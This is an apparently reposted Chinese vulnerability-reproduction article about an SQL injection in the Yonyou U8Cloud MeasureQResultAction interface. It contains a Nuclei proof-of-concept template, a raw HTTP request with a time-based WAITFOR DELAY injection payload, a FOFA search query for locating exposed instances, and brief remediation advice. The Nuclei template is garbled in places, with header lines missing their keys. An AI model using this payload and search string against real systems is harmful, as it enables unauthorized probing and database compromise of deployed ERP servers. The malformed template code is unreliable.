漏洞描述:
用友U8Cloud系统MeasureQResultAction接口处存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性,甚至获取对数据库的完全控制。
01
—
Nuclei POC
id: yongyou-U8Cloud-MeasureQResultAction-SQL
info:
name: 用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞
author: kingkong
severity: high
metadata:
title=="U8C" :
http:
raw:
|
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQResultAction&method=execute&selectQueryCondition=1%27);WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
Connection: close
and :
matchers:
type: dsl
dsl:
"duration>=3 && duration<=6 && status_code==200"
02
—
搜索语法
FOFA:title=="U8C"
界面如下
03
—
漏洞复现
漏洞检测POC
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQResultAction&method=execute&selectQueryCondition=1%27);WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
neclei批量检测截图
04
—
修复建议
1、使用参数化查询:使用参数化的 SQL 查询语句,而不是将用户输入直接拼接到 SQL 语句中。这可以防止恶意输入被误解为 SQL 代码。
2、输入验证和过滤:对用户输入的数据进行严格的验证和过滤,确保输入的数据符合预期格式和类型。
3、最小权限原则:确保数据库连接使用的账户具有最小必要的权限,避免使用具有过高权限的账户。
原文始发于微信公众号(脚本小子):用友U8Cloud系统MeasureQResultAction接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论